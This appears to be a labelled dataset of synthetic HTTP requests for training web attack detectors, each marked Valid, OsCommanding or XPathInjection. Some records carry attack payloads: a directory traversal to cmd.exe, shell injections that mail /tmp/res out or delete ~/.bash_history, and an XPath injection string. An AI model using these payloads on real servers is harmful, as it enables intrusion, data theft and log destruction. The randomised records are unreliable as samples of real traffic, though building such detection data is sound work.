null

End - Id: 29964
Start - Id: 34722
class: Valid
POST /eohem4bontm/avZXSfZN3bK/dgpaeotr7aB/6jQsqJ5d2.pl? HTTP/1.1
Content-Length: 131
Content-Language: oPa
Content-Encoding: compress
Content-Location: http://www.pbhhp.de/gJjts8/gil68yg/Ot0smrh.tar.gz
Content-MD5: aHQ4aGVzbGRlZWlkZWVvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Aug 06 11:48:24 UTC
Last-Modified: Thu, 30 Dec 04 15:02:51 UTC
Host: www.trotc.be
Connection: znrn
Accept: */*
Accept-Charset: x-mac-greek
Accept-Encoding: gzip;q=0.8, deflate;q=0.0
Accept-Language: jrD-othen;q=0.4
Cache-Control: min-fresh=5
Client-ip: 51.127.174.180
Cookie: 9e7elem64ix1r9t= 7ln zooejc;dd=rh=p[Qesrer;ut8ayHwnF7eor=e);osP=konquRz
Cookie2: $Version="53"
Date: Sun, 06 Dec 09 11:10:13 CET
ETag: "ghddgygvcZw2JBfz"
Expect: 100-continue
From: tta1oTo@Tdedrs.biz
If-Modified-Since: Mon, 05 Jan 09 19:38:12 UTC
If-Unmodified-Since: Sat, 19 Jun 04 12:57:24 UTC
If-Match: *
If-None-Match: "fvrM_rD-k8CcP7b1Z"
If-Range: *
Max-Forwards: 6281
MIME-Version: 5.6
Pragma: d='esh0is'
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: y3qyv pomge=ncjela
Range: 27601-82680,576792-311040,-975285
Referer: http://shypm.ch/ef5ds/rhsn/6tlm.jpeg
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: nAZb4udkX http://www.ohc6.org
UA-CPU: x86
UA-Disp: 550,4531,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 420x8395
Via: FTP/2.5 75.37.205.112:92836
Transfer-Encoding: compress
Upgrade: btCas3/7.1
Warning: 554 26.203.134.107 "jll9ie0otri3egtce" 
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 58172137914902284
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ta9yurfen=netqmmc iclor&thsfrEaa3rmen=replaceh &AhlhSOdlsi4egu=ieupdateftpm&hlSnTa4ShGkgfil=01&Ml1i572d9=de&eap=ryncs&6NckK=5017457

End - Id: 34722
Start - Id: 36619
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 224.159.159.92:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Sun, 04 May 08 08:41:29 GMT
ETag: W/"JDtCZoEZuAvr_k5"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Mon, 04 Jan 10 03:04:48 CET
If-Unmodified-Since: Sat, 03 Mar 07 16:07:00 GMT
If-Match: *
If-None-Match: *
If-Range: "Hy7Yen2Nw_C8liEHvP"
Max-Forwards: 504
MIME-Version: 1.9
Pragma: o='Ui'
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest nc=aeCb2501
Range: 8050-
Referer: http://www.2rtahnm.uk/urreen/taoift1/unisnn/abei/uqnszsul.ace
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: xKzYMsWA http://www.caneit.org
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 www.a1tuteos.gif, FTP/8.5 167.177.49.173:44, 8.0 www.rctpen3.htm
Transfer-Encoding: deflate
Upgrade: tweo/0.1, sfyot5/8.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36619
Start - Id: 43475
class: OsCommanding
GET /ayTqei/abtkWtNyA1ClR1/dt5cnt/Ersy/Enpes1xida/Wscriptq-_gm/M1Z1cXyQEqXosystem/6ZmMF/ElInrmwtmhd.bin?tskTqesoe=%40eTeinputc&i39_kk@LZ=oeth4hrexect3n%3B&tte=mQXcxvtnG&NkJFaJH=daVtuba9ii5&mrnnom=%27++%3B+cat++%2Ftmp%2Fres+mail+++++trintrtr%40el.com+++%3B&rul2r=h&betweenjSZ=8465019849&rurdIx2brtt=sfirmn&ednmexdi4swda=2ba%3F&C2QPHe4YnBsock_streamu=dseeY3 HTTP/1.1
Host: www.ktsb.fr:80
Connection: close
Accept: text/html;q=0.3, image/jpeg;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.7, iso-8859-8, iso-8859-4;q=0.8, cp-936, iso-8859-3
Accept-Encoding: 
Accept-Language: e-2;q=0.0, s-ton;q=0.8, sin-9es0i;q=0.0, d-hcmihc, eedrhe-y;q=0.2
Cache-Control: max-age=60176
Client-ip: 166.169.65.71
Cookie: ittmirn98meggg=fhs;boidFgh=007555;emnofwudEk0=rcs>1qzr
Cookie2: $Version="2"
Date: Sun, 01 Jul 07 14:45:56 GMT
ETag: W/"Gc17qNc-QoIwJfgPlGp"
Expect: Nlrhate=Eej0hh;etio=etesUr0
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sat, 16 Feb 08 15:27:13 GMT
If-Unmodified-Since: Sat, 23 Sep 06 24:02:41 UTC
If-Match: *
If-None-Match: "@vpav.5.eGQq70-hJS"
If-Range: Tue, 02 Nov 04 09:59:58 UTC
Max-Forwards: 2786
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest username="ncuenm"
Authorization: 9Nlt thnpw=h4eNtLb
Referer: /ocCcpa/unioela.zip
TE: trailers
Trailer: Range
User-Agent: terziiepe (oj2U1cZT4; k_GE2s2)
UA-CPU: Sparc
UA-Disp: 663,6446,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 333x8954
Via: FTP/8.7 www.7yerro.gif, FTP/4.5 www.9tsb.tiff
Transfer-Encoding: deflate
Upgrade: lrtrnn/3.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
----: -----------------------------

null

End - Id: 43475
Start - Id: 17437
class: Valid
GET /tZ/1Wr2U/re/iZ-d4ydqoIU_PS/MFE@j/2u.5p/0SbA.jpg?yeo3=c3U2185&rnus2i1Im=1a5682KBBj3S&oPa=7g+nLrasaer&nRalu5SetaI=tt%28%26i&iqenninoAra=aeeORthsu&nb1ngilJncdIoli=6%3Frlh%7Et1henle-t&ttVrooh2=6450&llmaa4tymdke0c=2282722000&rqi=763398&iav=woaimq1reiHmrJr&unnxaneIbtr=lN%26eta HTTP/1.0
Host: www.deco.be
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-2022-jp, x-mac-chinesesimp;q=0.9, macintosh;q=0.4, iso-8859-8, koi8-r
Accept-Encoding: *
Accept-Language: meSlM-rtm, ncEams-5aea, r-drw;q=0.5, aOrhes-ndnunn2;q=0.3, enSameE-so;q=0.8
Cache-Control: min-fresh=42
Client-ip: 0.107.219.106
Cookie: rOruyfac6sant=lprocessing-instructionoeehgeutn
Cookie2: $Version="13"
Date: Thu, 16 Sep 04 22:42:42 UTC
ETag: "Tz5k1C2FPPb20Du74.Ho"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: asobeo@yaOtdneg.de
If-Modified-Since: Tue, 12 Feb 08 07:51:06 CET
If-Unmodified-Since: Thu, 10 Jan 08 15:45:53 UTC
If-Match: "CZIejzt-F-VI5Z5Af"
If-None-Match: *
If-Range: Sun, 23 Jul 06 07:26:22 CET
Max-Forwards: 769
MIME-Version: 5.3
Pragma: r=qoide
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Digest nc=834c5efB
Range: 9-86744,230338-150282,297-98990
Referer: http://www.8uH0e.de/nT9tst/atetts/tgtja/wssiwo/5Juekc.ace
TE: chunked,trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.6 (X11; U; Linux i386 5.7; t6-tb; rv:2.4.4) Gecko/97727762
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: FTP/2.8 23.161.124.160
Transfer-Encoding: gzip
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 807 www.ienu.tiff:7433 "tnzkneini" "Fri, 27 Feb 09 18:56:57 UTC"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17437
Start - Id: 49289
class: XPathInjection
GET /a5edfiniaoetoAoT/kI8LG/sqR-iL/aayhldy/caendaaydom/Hjn/MTNNFt8/eW0E3XZF-@U.PnCa@/dXno8-.php4?PunionLdrcpHf=dnsb2%5C4ps3i+a+%40&0seAhe=cEliLU4.&lee=53147&c7libcn=mmctwzpS9oli&4enbmazmg5=ow1lVO7N&ue8ofhcrCu8wee=orogh&2pw5=1243&681rKSinput=ltsdt&Sd=13&u6rlpno=eosx%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++%2792detxne%27++++%3D++%27&grydn=achydzxt&hco9r=libimgy&libStiframeE@51ZFn=ntshutdownvdgo%3Feaesfs2+beea&1ht=hKxgi&oaTmUorae=logantceeaaz HTTP/1.1
Host: www.eOoeIdTtrt.uk
Connection: keep-alive
Accept: audio/*;q=0.2, video/*, text/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=9337
Client-ip: 226.125.42.173
Cookie: acceptGdX=50500666;els3aDndeTfnfad=3
Cookie2: $Version="213"
Date: Thu, 07 Dec 06 19:45:03 GMT
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sun, 19 Jun 05 09:51:40 UTC
If-Unmodified-Since: Thu, 08 Mar 07 12:26:26 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Jun 04 18:51:47 CET
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Digest username="eo0oTwp"
Range: 305761-528973
Referer: http://dasiLhd.com/szaiar/eeaa/vdmmlyo/miab.php3
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/0.5 (X11; U; Linux i586 9.5; ce-8b; rv:1.3.8) Gecko/17234396
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7888x6205
Via: Ecne/2.1 177.112.49.91:5, sA1/5.1 140.70.60.237:7405, 1.8 61.255.198.206
Transfer-Encoding: tnnc
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49289
Start - Id: 16457
class: Valid
GET /1tgnhdtnhy0aphme/4rrt/n2vknE/bgsound%ur5netcattelnet5/TKD/lebafbts9qseaisa/Nl5/binjOT1tmpaccess_logh/5zlceneca0ogth7s/wdngm3lsNe/hDvEI1hfPB_3/tPmjaWtagK26n4Td.html?ox=rdr5+omqx9rbO&rpNritkiNrt=%24%5B%3DIhi0eeyal&hna=0&MidropwAKUN=88372&NyldDo=07&8W6W=2&s7yhgoob=o5K6NFeo&e75satdeiudRLu=457324772&ee86TrfsTi=igkFiACoNYp&po7xae=ehesseSewUbAette8s&jforml7a1replacezb2=tahDodseeuN%5Dk&e9eeIUoem=tSfe6&8fmrSeOeg=tntoRmtjna3dm&MpruA=rwo HTTP/1.0
Host: www.ntcU.uk
Connection: ocxjtsk
Accept: text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=64
Client-ip: 49.183.229.231
Cookie: lzseyapxe=780252;ntri=tn3edcxpfrodEe4;sdpmqtneL=rHdZ5TMia.;iesrryrtfe0m=ohee0neCtpat;w1=ioareeire6te3;nissnuxt=r9K9
Cookie2: $Version="9"
Date: Thu, 03 Mar 05 20:37:24 UTC
ETag: "aJH2eEgCdBKTVPamiXo@"
Expect: 100-continue
From: 3wnaa@eosnseg.biz
If-Modified-Since: Wed, 21 Dec 05 02:56:41 CET
If-Unmodified-Since: Sat, 07 Mar 09 21:37:02 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Mar 09 16:53:51 CET
Max-Forwards: 088
MIME-Version: 2.7
Pragma: 9=1suK9
Proxy-Authorization: Digest uri=http://ec0oe5s.st/rjtraOn/s4in/laicdhe/ro1o/atato7he.ace
Authorization: Digest response="d4EDaEF673D402ce9bedCdEA85e716a4"
Range: -4,1-
Referer: http://www.nHcde4d.cz/heui/neybho/ettnsaau/lojdr/loewino4.wmn
TE: gzip,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/2.6 (Windows; U; WinNT 7.3; ih-ve; rv:2.7.4) Gecko/12351144
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 714x1442
Via: 9.3 www.nrbte7n0.html, etrooi/4.5 www.mcTo.css, 6.7 152.14.80.94
Transfer-Encoding: hiA1f4; ordceh=hywic8i
Upgrade: hrts/1.5, ocenff/3.9, hafw/0.7, whsmet/4.1
Warning: 398 www.bi0vAerr.tiff:59 "o6sDp9ta" "Sun, 19 Jun 05 14:33:21 UTC"
X-Forwarded-For: 74.91.46.48
X-Serial-Number: 764868889317962495
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16457
Start - Id: 10060
class: Valid
GET /v_/pinputgroup byGZhttpASvJjAX1U/cehtjSEma/lfizrasiar/gr/it8/rp2p1i6z-kTj/zgoeeDeneoudnetr/lQWdaqFH85.nsf?chiH8ontsotz=4n&exec5.8eVSa=xsserolHoah8tknnh HTTP/1.0
Host: www.sAierco.gov
Connection: close
Accept: text/plain;q=0.3, application/postscript;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: compress, gzip;q=0.3, compress, compress
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 252.84.176.28
Cookie: Chissh=a\iS
Cookie2: $Version="789"
Date: Wed, 13 May 09 11:21:55 GMT
ETag: "lfqCrGCAoRD6Fe.3abI_"
Expect: hedstDad
From: aemYeste@u736nnw.biz
If-Modified-Since: Tue, 23 May 06 19:09:19 GMT
If-Unmodified-Since: Wed, 31 Mar 10 17:52:53 UTC
If-Match: *
If-None-Match: "BiAx72EMtGrF39Dm"
If-Range: Sat, 01 Apr 06 23:33:23 GMT
Max-Forwards: 76
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=7042F6FA
Authorization: Basic azEzaWg6c1lmNXg=
Range: 312215-014657
Referer: /efhTft.php3
TE: chunked,chunked
Trailer: Range
User-Agent: Mozilla/0.3 (Windows; U; Win 9x 0.1; lI-mn; rv:9.6.8) Gecko/16917406
UA-CPU: PowerPC
UA-Disp: 3720,8490,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6453x8240
Via: HTTP/3.5 143.16.79.126, 1.1 203.188.175.77, 5.8 www.pUeb.jpg
Transfer-Encoding: gzip
Upgrade: tnEc/8.2, iai/8.8, eao/8.5
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 905480693565962672
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10060
Start - Id: 25623
class: Valid
GET /eIX3@jRqcSwU-HEPGBE/dA0haZNJx_aorcJ7IUA/eni51areF/lqErpkAlVXy7Mv71/dkN6Kd0N.mdb?vs=u5%25e%7CdropC5weeoe&lneuale=hrjg&onttU=026&rtsl=rgpm8epdvr&unastl2qn11ij=8&uBero1euoIFuii=ut HTTP/1.0
Host: 207.229.255.183
Connection: beB7aeg
Accept: */*;q=0.5
Accept-Charset: iso-2022-jp, x-mac-cyrillic;q=0.0, x-mac-hebrew;q=0.2, koi8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=9
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Mon, 13 Feb 06 23:58:48 UTC
ETag: "40qbs8cJE5VsXz7fNPK"
Expect: 100-continue
From: 0hi6jdg@0eiMas.net
If-Modified-Since: Thu, 14 Oct 04 03:23:29 GMT
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: *
If-None-Match: *
If-Range: "Yj-RCZJ1hwZv.hmFlLn"
Max-Forwards: 8
MIME-Version: 8.6
Pragma: 3ojeg=kq2sat
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: -1684
Referer: http://25mi.ch/crtw8t/ecxxjhw/oueiu.pl
TE: gzip;q=0.5
Trailer: Max-Forwards
User-Agent: if5ini0ee1aIe1s
UA-CPU: x86
UA-Disp: 8439,526,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0216x076
Via: oha5v/4.2 105.22.67.60, y4o3T/9.2 www.deol.jpeg
Transfer-Encoding: identity
Upgrade: j2sy/1.0, eHioTt/6.1, ellr/5.1, dd6/7.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 400505966006
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25623
Start - Id: 29277
class: Valid
GET /.TUi5m5wsKxQVIj/rXDIVxPx2jMXuVzW.mspx?S4z5winntKpasswdP-86=oggU&wzZ@SFEO=20&tanqueu=89&necTn2j3sOo4rN=732361352&dtemezaosrsaiE=rnenullsf HTTP/1.0
Host: 181.62.117.179
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: d-ntMx, oe-he;q=0.3, i-zEa3ee, axa-astc, emmsah-bs
Cache-Control: only-if-cached
Client-ip: 49.75.184.213
Cookie: sehnl1u=3682
Cookie2: $Version="5"
Date: Thu, 03 Jan 08 03:42:10 CET
ETag: W/"wX1FPfL7-9fgU6i1iNu"
Expect: toN3esaA
From: ioaIe7lb@6ltehaidqA.fr
If-Modified-Since: Sun, 03 Dec 06 16:57:50 CET
If-Unmodified-Since: Mon, 30 Mar 09 01:26:54 CET
If-Match: "s3VcPpi-vhyfGebp1Z"
If-None-Match: "u1Pa2cGGEclu3ubBVkTD"
If-Range: Wed, 20 Feb 08 24:05:57 CET
Max-Forwards: 55
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic dHBlbE5mOnJjYkVlc0E=
Authorization: NTLM TXJ1YXNhS2NGb2NoOWFidGxwRHdtZlBOdHFlc3Q0NG9qZG52b2RLaHJzbQ==
Range: 222382-446,006519-77,90-10
Referer: http://ael5irs.biz/ECzhiir/het6/ddvt5qh.tiff
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Omdighfth/0.8.0.6.7
UA-CPU: PowerPC
UA-Disp: 7798,9897,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1569x604
Via: HTTP/2.4 247.60.163.2, 3.2 202.214.210.197, 6.2 www.Ard0.html
Transfer-Encoding: eakfrt; wo9ceme=nuz8ueke
Upgrade: ditie/9.0, nPnia/5.2, aqAcm/4.5, damts/1.4, aOnoe9/8.1
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 74768030946395
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29277
Start - Id: 242
class: Valid
GET /ovrsufDsrtsseoafr/rxretzosnnt/iZNF8@Fm9kh/dqd8Ev/IEprocessing-instructionP6X_9/bp83ioeosrnttn8kb/tsueu/hEbTmWE8BIGlDb.R.js?m1ntAeasso=%3Bqo&4ieandnctr=8520&0x0hoeod6lti4=estylegz7etHa&Taeto4norfmbwie=otndrnde&ao3xToa=d48IRpxpJS&soI=shpooeltf8w&7lewbct4gmjn=5eraorzioarai+t2s+&gc3st=oML0F HTTP/1.0
Host: www.hxAt.cz
Connection: rymfa0
Accept: */*
Accept-Charset: euc-kr, iso-2022-kr;q=0.4, cp-932;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 69.214.106.13
Cookie: ioei9=iee;geigaOhpee=ish
Cookie2: $Version="87"
Date: Sat, 07 Jun 08 19:24:51 CET
ETag: W/"o-gjpjfrrHp3qFe"
Expect: eniti=caaIak;oledjTin
From: yeXhbouc@7trpphie.it
If-Modified-Since: Tue, 05 Jun 07 24:14:08 CET
If-Unmodified-Since: Wed, 28 Mar 07 20:55:45 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 May 05 02:06:09 CET
Max-Forwards: 31
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dnNzYXltZDp3aHV4MGJndA==
Authorization: NTLM bnR1b21sM3NhOXJjdGJhRTJ5ZEd3am9pa3JzbHRhYW9lcGU=
Range: 99303-6
Referer: http://xeIrral.net/tAqnm2t.wmn
TE: gzip;q=0.2,deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/2.1 (X11; U; Linux i386 2.6; cc-2o; rv:0.9.0) Gecko/68992255
UA-CPU: StrongARM
UA-Disp: 887,741,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 7.7 www.trtshssu.jpeg, HTTP/5.1 www.4nlgilg.html:65055
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 564 18.22.111.11 "soshftojabnnOr7rjean" 
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 25177874898076816291
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 242
Start - Id: 43417
class: OsCommanding
GET /s__/eMYo6FkKRRLUo7/fchqoEeohr/RmzKif4lfvmetaZ/MYFanza_htpass2Elt/@3@WAM/nHqqO.cfm?_v8-oRZbin0=%27+++%3B++++rm++++%7E%2F.bash_history+++++%3B&nektrroebdo=408598009 HTTP/1.0
Host: www.sttn.com:0018
Connection: lyxgs
Accept: text/*;q=0.7, video/mpeg;q=0.6
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.5, compress;q=0.7, compress, compress
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 164.53.226.238
Cookie: a6areot=rr4tm
Cookie2: $Version="4"
Date: Fri, 04 Aug 06 12:01:55 GMT
ETag: W/"oeuj7CbNiXs9jr4-G"
Expect: 100-continue
From: eM8p@ehnasbf.it
If-Modified-Since: Sun, 13 Jun 04 09:04:32 GMT
If-Unmodified-Since: Tue, 08 Jan 08 21:33:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Jan 04 09:06:32 GMT
Max-Forwards: 10
MIME-Version: 5.1
Pragma: tzh='y'
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: -99
Referer: /umn8bmn4/8Isniii/mqeEr.php3
TE: trailers,trailers
Trailer: Expect
User-Agent: sGg4z4V http://www.hq8dtaa.be
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 839 9.250.244.208 "zcim2oejoecon8f" 
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43417
Start - Id: 1476
class: Valid
GET /xIgZldXVYsueN/sctebwguhtiint0hz.gif?CEoP7wLIlw9=97935&isirafrs=+r&ni=+s6t+&jxttohO=sOxotTon89ir&iuanyoAnyuq4n=iudIseaubtl&sn4etag=ksiolietTubtn2fo6e&eHrnrrjtc=gko+lcoopen%5Bj5nm&nnXhtrehn8ihse=640&bPk6SWAh=4o HTTP/1.0
Host: 144.221.231.99
Connection: ihtTuuur
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oceeuoo-r9fTkeE, epid-eRdep, aecSsbt-fTanEwpy, 2rdas7-aeHeSath
Cache-Control: no-cache
Client-ip: 108.97.184.244
Cookie: 7idrsrustqnl=npTM;XsQ8@=7182738534;seide4=m.kA7dxOoI
Cookie2: $Version="7"
Date: Wed, 02 Dec 09 23:33:44 CET
ETag: W/"Ila-fdud7MEedwFbpQb@"
Expect: 100-continue
From: setludt@sgg7foaeak.be
If-Modified-Since: Tue, 02 Nov 04 22:16:49 CET
If-Unmodified-Since: Wed, 06 Oct 04 07:48:46 GMT
If-Match: "_gKZDUfsfa5tmAfu"
If-None-Match: "ODr2HDw27osgWC5tv"
If-Range: *
Max-Forwards: 049
MIME-Version: 9.3
Pragma: sbLhx='e'
Proxy-Authorization: iUTNle deiuEMot=etidst
Authorization: Basic cm12YTY6aW9BY29lZW0=
Range: -64,0-
Referer: /tcahae/nlceTlS/uvalaedl/mtSdm/me3eNni.rar
TE: trailers,chunked
Trailer: If-Match
User-Agent: Mozilla/6.7 (X11; U; Unix 5.7; tu-sw; rv:7.4.4) Gecko/33352309
UA-CPU: x86
UA-Disp: 8211,4970,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 601x836
Via: 2.0 www.shRxt.jpg, 1.9 11.105.78.66
Transfer-Encoding: A7a7; oibTnso=tssRryni
Upgrade: neitwi/0.9, uctqlB/3.1, earnsE/8.0, iaueI/8.8, udoan/5.7
Warning: 445 148.177.34.53 "uas4eeti0naDsAesn8" 
X-Forwarded-For: 6.0.93.109
X-Serial-Number: 8617636872722590
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 1476
Start - Id: 29307
class: Valid
GET /yp6yzdqjhaae7/6nWMzi9/hoz@Lq8LcG@JUGZv@z.html?satityrehrulncs=w4&7oOc7=3764113&mkmwq=e-03G&JjchildLDNYVRcg=8zdudhed0eea&anar4s9ednit=7&Rrpelhf=0&ed=tgdCI&ssnaiWaYrrrt=weotD&7mictnlntgue=n+3mtDbetweenddocumentor8%5C&zmodxxir=w7%3D7rinputreplacelbds%3C&dha6=ra&gnIaC0=ioSneelfEaeitg HTTP/1.0
Host: 36.165.6.226:80
Connection: keep-alive
Accept: audio/basic, text/*;q=0.4, text/xml;q=0.4
Accept-Charset: iso-8859-8
Accept-Encoding: *;q=0.9
Accept-Language: t42gysR-Ea, pm-5iubwa;q=0.3, e-neew, HDwg-rso
Cache-Control: no-cache
Client-ip: 189.125.66.35
Cookie: @dobjectxPG=lNn9uc7Ha;esT=tv;erf8n=5HRE
Cookie2: $Version="18"
Date: Wed, 11 Jun 08 12:33:10 CET
ETag: W/"ykBKz8OIhj28Pvu"
Expect: snnotsah
From: yttt5iy@rcto.com
If-Modified-Since: Fri, 16 Oct 09 08:07:09 UTC
If-Unmodified-Since: Sun, 16 Mar 08 23:59:01 CET
If-Match: "884.FwXpzmk4G04U7Y"
If-None-Match: "1e_qiLwN5m@QPOC"
If-Range: "PPSeRbc2j7eS0kvYeb"
Max-Forwards: 6
MIME-Version: 0.7
Pragma: wS2p='s2nzimb'
Proxy-Authorization: Basic ZXlkYXdpRjpzaW5wYW1v
Authorization: Digest username="eonegul6"
Range: -1680
Referer: /I36epaz/nrcmsri/tWeh/aUdrreet/mhgni8t.zip
TE: trailers,chunked;q=0.3,trailers
Trailer: Referer
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 1.3; ek-da; rv:1.8.0) Gecko/51344030
UA-CPU: StrongARM
UA-Disp: 640,917,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8762x9260
Via: FTP/3.8 169.160.244.230, HTTP/9.0 www.tueorhd8.gif
Transfer-Encoding: deflate
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 708 www.opmsnet.html "atmareba0" "Wed, 30 May 07 20:29:06 CET"
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29307
Start - Id: 17968
class: Valid
GET /tc1u_QG20C1FW4TSKKA/gTrPvVe4CJ40B/sJlZkUa82K7HA63S6Cht/eS8qwXUlWleDZ@01Tc/i5sLULGB/dreanbndR8sy9eUedtm/2@jjxKjsKx553FnqiD/eNodz5/oZlBC9Pvz-OUvS/s6R.nsf?s194a5Arn=tartelnetrnb&otq=rwg&mOPincludeYKEhttpq=89711&h2k=7k-S HTTP/1.0
Host: www.rqRrYt.org
Connection: keep-alive
Accept: application/*, video/*;q=0.2, text/xml;q=0.6
Accept-Charset: windows-874
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 30.169.34.138
